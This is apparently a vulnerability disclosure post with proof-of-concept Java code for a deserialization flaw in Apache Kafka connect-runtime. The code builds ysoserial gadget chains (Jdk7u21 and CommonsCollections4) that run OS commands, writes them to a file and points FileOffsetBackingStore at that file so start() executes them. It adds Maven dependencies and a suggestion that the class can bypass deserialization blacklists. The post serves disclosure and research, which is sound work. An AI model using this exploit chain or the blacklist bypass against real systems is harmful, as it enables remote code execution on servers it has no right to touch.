The author directly provides the proof-of-concept for the vulnerability: a CVE ID has been requested for this Apache Kafka deserialization vulnerability in connect-runtime.
import junit.framework.Test;
import junit.framework.TestCase;
import junit.framework.TestSuite;
import org.apache.commons.io.FileUtils;
import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
import org.apache.kafka.connect.storage.FileOffsetBackingStore;
import ysoserial.payloads.Jdk7u21;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;
// PoC: FileOffsetBackingStore.start() deserializes the configured offset file with
// native Java serialization, so pointing OFFSET_STORAGE_FILE_FILENAME_CONFIG at a
// crafted payload file triggers the gadget chain during start().
public void test_Kafka_Deser() throws Exception {
StandaloneConfig config;
String projectDir = System.getProperty("user.dir");
// Build the ysoserial Jdk7u21 gadget chain; the argument is the OS command it runs.
Jdk7u21 jdk7u21 = new Jdk7u21();
Object o = jdk7u21.getObject("touch vul");
byte[] ser = serialize(o);
// Write the serialized payload to the path the offset store will later read.
File tempFile = new File(projectDir + "/payload.ser");
FileUtils.writeByteArrayToFile(tempFile, ser);
// Minimal standalone-worker configuration; the offset storage file is the attack vector.
Map<String, String> props = new HashMap<String, String>();
props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG,
tempFile.getAbsolutePath());
props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
config = new StandaloneConfig(props);
// start() reads and deserializes the offset file -> the gadget chain fires here.
FileOffsetBackingStore restore = new FileOffsetBackingStore();
restore.configure(config);
restore.start();
}
/**
 * Serializes the given object graph with standard Java serialization.
 *
 * @param object the object to serialize (here: the gadget-chain payload)
 * @return the serialized bytes
 * @throws IOException if serialization fails
 */
private byte[] serialize(Object object) throws IOException {
    ByteArrayOutputStream bout = new ByteArrayOutputStream();
    // try-with-resources: the original flushed but never closed the stream,
    // leaking the ObjectOutputStream; close() also flushes.
    try (ObjectOutputStream out = new ObjectOutputStream(bout)) {
        out.writeObject(object);
    }
    return bout.toByteArray();
}
I consulted the R&amp;D personnel, who said this class does not appear in their own code. This deserialization entry point is therefore likely useful for bypassing some blacklists — similar to the MarshalledObject class bypass in WebLogic.
(Relevant class: `MarshalledObject`.)
A global search of the Kafka source code shows that one of its own test cases also uses this vulnerable deserialization pattern. Do you know of other usage scenarios for this class? Feel free to get in touch and compare notes.
Build environment test:
package ysoserial.exploit;
import org.apache.commons.io.FileUtils;
import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
import org.apache.kafka.connect.storage.FileOffsetBackingStore;
import ysoserial.payloads.CommonsCollections4;
import ysoserial.payloads.Jdk7u21;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;
/**
 * PoC for the Apache Kafka connect-runtime deserialization vulnerability:
 * {@code FileOffsetBackingStore.start()} deserializes the configured offset file
 * with native Java serialization, so pointing the offset-storage file at a
 * ysoserial payload executes the embedded gadget chain (here CommonsCollections4
 * running "calc") when the store starts.
 */
public class KafkaExploitTest {

    public static void test_Kafka_Deser() throws Exception {
        StandaloneConfig config;
        String projectDir = System.getProperty("user.dir");

        // Build the CommonsCollections4 gadget chain; the argument is the OS command it runs.
        CommonsCollections4 cc4 = new CommonsCollections4();
        Object o = cc4.getObject("calc");
        byte[] ser = serialize(o);

        // Write the serialized payload to the path the offset store will later read.
        File tempFile = new File(projectDir + "/payload.ser");
        FileUtils.writeByteArrayToFile(tempFile, ser);

        // Minimal standalone-worker configuration; the offset storage file is the attack vector.
        Map<String, String> props = new HashMap<String, String>();
        props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG, tempFile.getAbsolutePath());
        props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        config = new StandaloneConfig(props);

        // start() reads and deserializes the offset file -> the gadget chain fires here.
        FileOffsetBackingStore restore = new FileOffsetBackingStore();
        restore.configure(config);
        restore.start();
    }

    /**
     * Serializes the given object graph with standard Java serialization.
     *
     * @param object the object to serialize (here: the gadget-chain payload)
     * @return the serialized bytes
     * @throws IOException if serialization fails
     */
    private static byte[] serialize(Object object) throws IOException {
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        // try-with-resources: the original flushed but never closed the stream,
        // leaking the ObjectOutputStream; close() also flushes.
        try (ObjectOutputStream out = new ObjectOutputStream(bout)) {
            out.writeObject(object);
        }
        return bout.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        KafkaExploitTest.test_Kafka_Deser();
    }
}
Pom.xml add dependency:
<!-- https://mvnrepository.com/artifact/org.apache.kafka/connect-runtime -->
<dependency>
<groupId>org.apache.kafka</groupId>
<artifactId>connect-runtime</artifactId>
<version>0.11.0.0</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.kafka/connect-json -->
<dependency>
<groupId>org.apache.kafka</groupId>
<artifactId>connect-json</artifactId>
<version>0.11.0.0</version>
<scope>test</scope>
</dependency>
Vulnerability Demo:
@Test
// Kafka's own unit test exhibits the vulnerable pattern: offsets written via
// store.set(...) are read back by a fresh FileOffsetBackingStore whose start()
// deserializes the offset file with native Java serialization.
// NOTE(review): fields `store`, `config`, `firstSet` and helpers `buffer`,
// expect*Callback come from the enclosing test class, not shown here.
public void testSaveRestore() throws Exception {
Callback<Void> setCallback = expectSuccessfulSetCallback();
Callback<Map<ByteBuffer, ByteBuffer>> getCallback = expectSuccessfulGetCallback();
PowerMock.replayAll();
// Persist one key/value pair, then stop so the data is flushed to the offset file.
store.set(firstSet, setCallback).get();
store.stop();
// Restore into a new store to ensure correct reload from scratch
FileOffsetBackingStore restore = new FileOffsetBackingStore();
restore.configure(config);
// start() deserializes the offset file -- the step an attacker-controlled file abuses.
restore.start();
Map<ByteBuffer, ByteBuffer> values = restore.get(Arrays.asList(buffer("key")), getCallback).get();
assertEquals(buffer("value"), values.get(buffer("key")));
PowerMock.verifyAll();
}
In practice, Avro or JSON is mostly used for business data serialization; but wherever JDK-native serialization is used, this function is the one that performs the deserialization.